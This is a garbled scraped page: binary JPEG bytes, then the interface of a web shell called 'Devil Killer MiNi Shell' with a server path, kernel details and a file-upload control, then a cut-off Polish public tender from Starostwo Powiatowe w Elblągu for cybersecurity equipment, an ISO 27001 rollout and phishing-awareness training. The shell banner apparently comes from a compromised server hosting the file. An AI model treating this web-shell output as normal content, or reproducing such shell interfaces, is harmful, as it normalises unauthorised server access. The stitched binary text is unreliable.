JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250506/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250506/0021863401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Wzmacnianie systemu bezpieczeństwa informacji Starostwa Powiatowego w Elblągu i wybranych jednostek organizacyjnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Starostwo Powiatowe w Elblągu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 170753615</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Saperów 14 A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Elbląg</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">82-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL621 - Elbląski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@powiat.elblag.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">powiat.elblag.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wzmacnianie systemu bezpieczeństwa informacji Starostwa Powiatowego w Elblągu i wybranych jednostek organizacyjnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fbd405d0-c089-479c-aa55-80a9984032e1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00218634</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00069987/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Wzmacnianie systemu bezpieczeństwa informacji Starostwa Powiatowego w Elblągu i wybranych jednostek organizacyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Cyberbezpieczny Samorząd </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-fbd405d0-c089-479c-aa55-80a9984032e1 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Określa regulamin platformy e-Zamówienia: https://edu.ezamowienia.gov.pl/pl/regulamin/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>- Administratorem Pani/Pana danych osobowych jest Starosta Powiatu Elbląskiego, dane adresowe: <br/>ul. Saperów 14A, 82-300 Elbląg.<br/>- Administrator wyznaczył Inspektora Ochrony Danych w Starostwie Powiatowym w Elblągu, z którym można kontaktować się za pośrednictwem adresu e-mail: mfederewicz@powiat.elblag.pl <br/>- Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.: „Wzmacnianie systemu bezpieczeństwa informacji Starostwa Powiatowego w Elblągu i wybranych jednostek organizacyjnych” prowadzonym w trybie podstawowym – art. 275 pkt 1 uPzp;<br/>- odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 uPzp; <br/>- Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 uPzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>- obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach uPzp, związanym z udziałem w postępowaniu <br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają <br/>z uPzp; <br/>- w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>- posiada Pani/Pan:<br/>−	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>−	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>−	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***; <br/>−	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>- nie przysługuje Pani/Panu:<br/>−	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO<br/>* Wyjaśnienie: informacja w tym zakresie jest wymagana, jeżeli w odniesieniu do danego administratora lub podmiotu przetwarzającego istnieje obowiązek wyznaczenia inspektora ochrony danych osobowych.<br/>** Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>*** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>Platforma e-Zamówienia <br/>INFORMACJA DOTYCZĄCA PRZETWARZANIA DANYCH OSOBOWYCH <br/>Odbiorcą Pani/Pana danych osobowych będą upoważnieni pracownicy Starostwa Powiatowego <br/>w Elblągu oraz Urząd Zamówień Publicznych, ul. Postępu 17 A, 02-676 Warszawa, jako Administrator Platformy e-Zamówienia, na której Powiat Elbląski prowadzi postępowania o udzielenie zamówienia publicznego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR.272.2.1.2025.AC</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i wdrożenie sprzętu, oprogramowania oraz usługi wsparcia obejmuje:	<br/>Przełącznik sieci szkieletowej - Switch - L3 – 8 szt.	<br/>Switch zarządzalny – 1 szt.	<br/>Router do modernizacji sieci internetowej – 3 szt.	<br/>Serwer NAS – 4 szt.	<br/>Dyski HDD do NAS – 12 szt.	<br/>Serwer do wykonywania kopii zapasowych – 1 szt.	<br/>Serwer – 1 szt.	<br/>Macierz dyskowa – 3 szt.	<br/>Dysk zewnętrzny do tworzenia kopii zapasowych – 1 szt.	<br/>UPS1 - 800VA – 7 szt.	<br/>UPS2 - 1500VA – 5 szt.	<br/>UPS3 – 10kVA – 1 szt.	<br/>Generator prądu – 1 szt.	<br/>Oprogramowanie systemowe	<br/>System monitorowania bezpieczeństwa sieci	<br/>System zarządzania tożsamością cyfrową	<br/>Oprogramowanie antywirusowe	<br/>Usługi specjalistycznego doradztwa i zarządzania infrastrukturą sieciową	<br/>Instalacja dostarczonych urządzeń	<br/>Przełącznik sieci szkieletowej - Switch - L3<br/>Switch zarządzalny<br/>Router do modernizacji sieci internetowej<br/>Serwer NAS<br/>Serwer do wykonywania kopii zapasowych<br/>Serwer<br/>Macierz dyskowa<br/>UPS2 - 1500VA	<br/>UPS3 – 10kVA	<br/>Generator prądu<br/>System monitorowania bezpieczeństwa sieci<br/>System zarządzania tożsamością cyfrową<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30233141-1 - Nadmiarowa macierz niezależnych dysków (RAID)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32420000-3 - Urządzenia sieciowe</p> <p class="mb-0">48820000-2 - Serwery</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <p class="mb-0">30234200-0 - Dyski optyczne</p> <p class="mb-0">48219000-6 - Pakiety oprogramowania do różnych operacji sieciowych</p> <p class="mb-0">48510000-6 - Pakiety oprogramowania komunikacyjnego</p> <p class="mb-0">48730000-4 - Pakiety oprogramowania zabezpieczającego</p> <p class="mb-0">48732000-8 - Pakiety oprogramowania do zabezpieczania danych</p> <p class="mb-0">48760000-3 - Pakiety oprogramowania do ochrony antywirusowej</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">72265000-0 - Usługi konfiguracji oprogramowania</p> <p class="mb-0">79417000-0 - Usługi doradcze w zakresie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenianiu ofert Zamawiający będzie kierował się podanymi poniżej kryteriami: Cena – 60 pkt., Termin obowiązywania gwarancji na sprzęt – 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin obowiązywania gwarancji na sprzęt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opracowanie i wdrożenie Systemu Zarządzania Bezpieczeństwem Informacji (dalej SZBI)- Starostwo Powiatowe w Elblągu, Dom Pomocy Społecznej w Tolkmicku i Placówka Opiekuńczo-Wychowawcza „Samodzielne Mieszkanie” w Pasłęku. <br/>1.Wykonawca zapewni audytora do opracowania SZBI i przeprowadzenia audytu końcowego na zgodność ISO 27001, który dokona oceny funkcjonowania SZBI i przedstawi jego wyniki <br/>w raporcie z audytu.<br/>2. Audytor musi posiadać co najmniej poniższe certyfikaty:<br/>1)certyfikat audytora wiodącego systemu zarządzania bezpieczeństwem informacji według normy PN-EN ISO/IEC 27001 wydany przez jednostkę oceniającą zgodność, akredytowaną zgodnie z przepisami ustawy z dnia 13 kwietnia 2016 r. o systemach oceny zgodności <br/>i nadzoru rynku (Dz. U. z 2022 r. poz. 1854 ze zmianami), w zakresie certyfikacji osób i <br/>2) certyfikat audytora wiodącego systemu zarządzania ciągłością działania PN-EN ISO 22301 wydany przez jednostkę oceniającą zgodność, akredytowaną zgodnie z przepisami ustawy z dnia 13 kwietnia 2016 r. o systemach oceny zgodności i nadzoru rynku, w zakresie certyfikacji osób. <br/>3.W ramach realizacji Przedmiotu Zamówienia Zamawiający oczekuje opracowania SZBI oraz realizacji audytu końcowego SZBI – w terminie zgodnie z SWZ. <br/>4.Wykonawca kompleksowo przeprowadzi Zamawiającego przez proces wdrożenia systemowego podejścia do zarządzania bezpieczeństwem i ciągłością działania, poczynając od ustalenia kontekstu organizacji i celów bezpieczeństwa, przygotuje wymagane normą ISO 27001 dokumenty, a następnie wdroży je do użytku w instytucji.<br/>5.Wykonawca opracuje System Zarządzania Bezpieczeństwem Informacji - SZBI w oparciu o wykonane analizy, Polską Normę PN-ISO/IEC 27001, ustawę o Krajowym Systemie Cyberbezpieczeństwa, dyrektywę NIS2 i Rozporządzenie Parlamentu Europejskiego RODO, ustawę o informatyzacji podmiotów realizujących zadania publiczne oraz inne obowiązujące przepisy w tym zakresie.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 10 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71248000-8 - Nadzór nad projektem i dokumentacją</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79417000-0 - Usługi doradcze w zakresie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W zakresie Zadania nr 2 – Opracowanie i wdrożenie SZBI przy ocenianiu ofert Zamawiający będzie kierował się podanym poniżej kryterium:<br/> Cena – 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Szkolenia pracowników - Starostwo Powiatowe w Elblągu i wybranych jednostek organizacyjnych Powiatu Elbląskiego <br/>Pakiet szkoleń dla wszystkich pracowników<br/>Kompleksowa usługa „Podnoszenia Świadomości Bezpieczeństwa” (Security Awareness), umożliwiająca przeprowadzenie kampanii edukacyjnej z zakresu podstaw bezpieczeństwa <br/>w internecie oraz z zakresu systemu zarządzania bezpieczeństwem. Dedykowana użytkownikom Zamawiającego i świadczona przez okres 2 miesięcy. Szkolenie ma objąć kadrę kierowniczą oraz pracowników Zamawiającego w liczbie 25 osób.<br/>Usługa musi zawierać:<br/>1.	Platformę szkoleniową zawierającą minimum 30 rodzajów szkoleń, dostępnych w języku polskim w postaci filmów i prezentacji, zakończonych testami lub quizami sprawdzającymi przyswojenie przedstawianego materiału merytorycznego.<br/>1)	Szkolenia muszą zapewniać zakres tematyczny co najmniej w ujęciu:<br/>a)	Podstawy bezpiecznego internetu<br/>b)	Bezpieczeństwo poczty <br/>c)	Załączniki w poczcie elektronicznej<br/>d)	Phishing<br/>e)	Spyware/malware<br/>f)	Bezpieczeństwo danych osobowych RODO/GDRP<br/>g)	Bezpieczne hasła<br/>h) Menedżery haseł<br/>i)	Bezpieczeństwo urządzeń mobilnych<br/>j)	Uwierzytelnianie wieloskładnikowe (MFA)<br/>k)	Bezpieczna praca zdalna<br/>l)	Bezpieczna praca w biurze<br/>m)	Sieci społeczne<br/>n)	Socjotechnika stosowana<br/>o)	Zakupy w internecie<br/>2)	Użytkownicy powinni być podzieleni na grupy, dla których będą przygotowane indywidualne harmonogramy szkoleń oraz dedykowane kampanie phishingowe.<br/>3)	Łączny czas trwania wszystkich materiałów szkoleniowych powinien wynosić co najmniej 8 godzin zegarowych.<br/>4)	Wykonawca musi zapewnić możliwość wydrukowania zestawień pracowników, którzy odbyli szkolenia oraz indywidualnych zaświadczeń o ukończeniu szkolenia.<br/>2.	Dedykowaną platformę phishingową pozwalającą na generowanie i wysyłanie spreparowanych maili phishingowych do wszystkich użytkowników usługi oraz na generowanie, co najmniej, poniższych typów wiadomości e-mail:<br/>1)	z linkiem prowadzącym do stronnym internetowej,<br/>2)	z linkiem do portalu podszywającego się pod usługodawcę i pozwalającego na logowanie (weryfikację, czy użytkownicy są gotowi na fałszywej stronie portalu zalogować się swoim loginem i hasłem); platforma musi zapewniać bezpieczeństwo takiej operacji,<br/>3)	z załącznikiem (szyfrowanym i niezaszyfrowanym) zawierającym potencjalnie niebezpieczny kod,<br/>4)	z załącznikiem w postaci dokumentu Word lub Excel zawierającym potencjalnie niebezpieczny kod.<br/>W przypadku, gdy użytkownik pozwoli się oszukać, platforma musi posiadać możliwość automatycznego skierowania takiego użytkownika na dodatkowe szkolenie lub ponowne wykonanie jednego z wcześniej ukończonych szkoleń.<br/>3.	Dedykowaną platformę dostarczającą raporty obejmujące minimum:<br/>1)	status wykonania szkoleń przez użytkowników, z podziałem na grupy i uwzględnieniem terminu wykonania szkoleń oraz wyniku quizów i testów,<br/>2)	status kampanii, wraz z raportem o liczbie wysłanych e-maili oraz szczegółach zwierających informację: kto otworzył wiadomość, kto i kiedy pozwolił się oszukać, kto otworzył załącznik, jaka była platforma z jakiej wykonał tę operację oraz szczegółowe daty wykonania tych operacji.<br/>Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 10 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80511000-9 - Usługi szkolenia personelu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79417000-0 - Usługi doradcze w zakresie bezpieczeństwa</p> <p class="mb-0">80550000-4 - Usługi szkolenia w dziedzinie bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">2 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W zakresie Zadania nr 3 – Szkolenie z zakresu cyberbezpieczeństwa dla 25 pracowników wskazanych przez Zamawiającego przy ocenianiu ofert Zamawiający będzie kierował się podanym poniżej 